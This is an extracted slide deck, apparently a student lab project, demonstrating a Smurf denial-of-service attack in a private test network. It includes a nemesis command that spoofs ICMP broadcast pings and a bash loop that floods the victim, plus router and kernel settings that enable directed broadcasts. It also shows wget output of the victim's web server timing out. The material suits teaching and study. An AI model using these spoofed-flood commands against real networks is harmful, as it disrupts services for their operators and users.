Smurf Attack Farhan Sajjad Outline Smurf Attack What
- Slides: 17
Smurf Attack Farhan Sajjad
Outline �Smurf Attack �What is a Smurf Attack? �How is it Engineered? �Project 1 �Test Environment �Conducting the Attack �Results and Observations �References �Questions?
What is a Smurf Attack? �Denial of Service Attack using spoofed broadcast ping messages.
How is it Engineered? �Essentially, by “spoofing” a broadcasted ICMP Echo request with the victim’s IP address as the sender The ICMP Header
Sample Spoof root@jotil. Move# nemesis icmp -v -i 8 -c 0 -S 192. 168. 0. 5 -D 192. 168. 0. 255 -H 08: 00: 27: 29: 4 C: F 0 ICMP Packet Injection -=- The NEMESIS Project Version 1. 4 (Build 26) [MAC] 08: 00: 27: 29: 4 C: F 0 > FF: FF: FF: FF [Ethernet type] IP (0 x 0800) [IP] 192. 168. 0. 5 > 192. 168. 0. 255 [IP ID] 3121 [IP Proto] ICMP (1) [IP TTL] 255 [IP TOS] 0 x 00 [IP Frag offset] 0 x 0000 [IP Frag flags] [ICMP Type] Echo Request [ICMP Code] Echo Request [ICMP ID] 57730 [ICMP Seq number] 8233 Wrote 42 byte ICMP packet through linktype DLT_EN 10 MB. ICMP Packet Injected
The Test Environment
The Test Environment (continued) �All the Linux machines had Wireshark installed on them �The attacker had Nemesis installed on it, to generate spoofed IP packets �The victim had HTTP server on it, to check its availability �Had to turn on No-IP Directed Broadcast �Linux OS: root@jotil. Move# echo "0" | cat > /proc/sys/net/ipv 4/icmp_echo_ignore_broadcasts �Cisco IOS: Router. C(config)#int f 0/0 Router. C(config-if)#ip directed-broadcast
Conducting the Attack �Created a small payload file of size 1472 bytes �Ran a small script at the attacking machine, which looped to send spoofed ICMP packets #!/bin/bash i=10000 while test $i != 0 do nemesis icmp -i 8 -c 0 -S 192. 168. 0. 5 -D 192. 168. 0. 255 -H 00: 06: 29: DF: 2 A: DA -P payload_file echo "$i" i=`expr $i - 1` done
Results The Attacker’s Screenshot
The Victim’s Screenshot During Attack
The Victim’s Screenshot After Attack
The Observer’s Screenshot
root@hpgcpc 06: /home/farhan# time wget 192. 168. 0. 5 --2009 -11 -13 20: 49: 45 -- http: //192. 168. 0. 5/ Connecting to 192. 168. 0. 5: 80. . . connected. HTTP request sent, awaiting response. . . 200 OK Length: 177 [text/html] Saving to: `index. html' 100%[===================>] 177 --. -K/s in 0 s 2009 -11 -13 20: 49: 45 (15. 1 MB/s) - `index. html' saved [177/177] real 0 m 0. 008 s user 0 m 0. 004 s sys 0 m 0. 000 s root@hpgcpc 06: /home/farhan# time wget 192. 168. 0. 5 --2009 -11 -13 20: 50: 03 -- http: //192. 168. 0. 5/ Connecting to 192. 168. 0. 5: 80. . . failed: Connection timed out. Retrying. . --2009 -11 -13 20: 59: 36 -- (try: 4) http: //192. 168. 0. 5/ Connecting to 192. 168. 0. 5: 80. . . connected. HTTP request sent, awaiting response. . . 200 OK Length: 177 [text/html] Saving to: `index. html' 100%[===================>] 177 --. -K/s in 0 s 2009 -11 -13 20: 59: 36 (18. 1 MB/s) - `index. html' saved [177/177] real 9 m 33. 041 s user 0 m 0. 008 s sys 0 m 0. 000 s
Observations �Number of participating nodes crucial to the effectiveness of the attack �Hardly effected the CPU or Memory utilization of the Victim, however its network resources were overwhelmed and its services were unreachable �Networked devices after 1998 has turned off No -IP directed broadcasts, so it is difficult to conduct such attacks, however Smurf Amplifiers exists!
References [1] Smurf attack, from Wikipedia: http: //en. wikipedia. org/wiki/Smurf_attack [2] smurf. c, [Online document] Available: http: //personal. telefonica. terra. es/web/alexb/e/smurf. c [3] The Internet Control Message Protocol, from Wikipedia: http: //en. wikipedia. org/wiki/Internet_Control_Message_Protocol [4] Ping, from Wikipedia: http: //en. wikipedia. org/wiki/Ping [5] The ICMP Header. [Online document] Available: http: //blog. csdn. net/xuhx/archive/2008/04/16/2297266. aspx [6] How a Broadcast Address Works. [Online document] Available: http: //learn-networking. com/network-design/how -a-broadcast-address-works [7] Denial-of-service attack, from Wikipedia: http: //en. wikipedia. org/wiki/Denial-of-service_attack [8] Nemesis Packet Injection Tool Suite. [Online document] Available: http: //nemesis. sourceforge. net/ [9] Manpage of NEMESIS-ICMP. [Online document] Available: http: //nemesis. sourceforge. net/manpages/nemesisicmp. 1. html [10] Wireshark. [Online document] Available: http: //www. wireshark. org/ [11] Securing Cisco Routers with No IP Directed-Broadcast. [Online document] Available: http: //learnnetworking. com/network-security/securing-cisco-routers-with-no-ip-directed-broadcast [12] Craig A. Hugen, The latest in denial of service attacks: "Smurfing". Description and information to minimize effects. [Online document] Available: http: //www. pentics. net/denial-of-service/white-papers/smurf. cgi [13] CERT® Advisory CA-1998 -01 Smurf IP Denial-of-Service Attacks. [Online document] Available: http: //www. cert. org/advisories/CA-1998 -01. html [14] Smurf Attack. [Online document] Available: http: //www. softpanorama. org/Net/Internet_layer/ICMP/smurf_attack. shtml [15] Smurf Amplifier Registry [Online document] Available: http: //www. powertech. no/smurf/ [16] Brian Hatch, Firewalling /proc entries [Online document] Available: http: //www. hackinglinuxexposed. com/articles/20021015. html [17] Todd Lammle, CCNA: Cisco Certified Network Associate Study Guide. ISBN: 978 -0470110089. Publisher: Sybex; 6 edition (August 29, 2007).
Questions?
Thank You!
- Smurf outline
- Farhan mashari farhan
- Smurf parasite
- Out line meaning
- Smurf attack
- Smurf outline
- Smurf outline
- Instrumental aggression
- Pin index system
- Gestalt therapy examples
- Sajjad urban dictionary
- Mian ahmad farhan
- Farhan helmy
- Khalid farhan course google drive
- Is 605
- Active attack and passive attack
- Sandwich sentences
- Arp cache poisoning attack fix